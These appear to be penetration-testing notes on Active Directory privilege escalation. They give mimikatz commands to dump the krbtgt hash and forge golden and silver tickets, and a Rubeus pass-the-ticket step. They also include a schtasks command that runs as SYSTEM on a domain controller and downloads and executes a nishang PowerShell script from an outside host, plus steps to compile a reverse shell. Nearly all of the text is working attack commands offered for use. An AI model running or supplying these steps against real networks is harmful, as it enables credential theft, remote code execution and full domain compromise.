Extract the krbtgt hash via DCSync or mimikatz:
mimikatz# lsadump::lsa /patch
Same as method 1, using mimikatz golden module:
mimikatz # kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /sids:S-1-5-21-XXX-500 /krbtgt:FB18AD18D520EA42025E3F676D325F23 /startoffset:0 /endin:600 /renewmax:10080
Next, convert the ticket to base64:
PS C:\Tools> [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\tools\ticket.kirbi"))
Pass the ticket using Rubeus:
PS C:\Tools> .\Rubeus.exe ptt /ticket:base64...
Best reference: https://adsecurity.org/?p=2011
This attack needs the machine hash. Example: dt-dc$
Create and inject a silver ticket using mimikatz kerberos::golden. Confirm ticket using klist.
PS C:\Tools> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /target:dt-dc.domain.local /service:HOST /rc4:FB18AD18D520EA42025E3F676D325F23 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
Create a scheduled task that downloads and executes nishang (the quotes are tricky).
PS C:\Tools> schtasks /create /S dt-dc.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "priv4" /TR "powershell.exe -c 'iex(new-object net.webclient).downloadstring(''http://10.10.10.10/9001.ps1''')'"
Run the scheduled task.
PS C:\Tools> schtasks /Run /S dt-dc.nuclear.site /TN "priv4"
Reverse shells: https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
Compile with Visual Studio.
For C# command-line compiling:
PS C:\Tools> csc -out:rev.exe Program.cs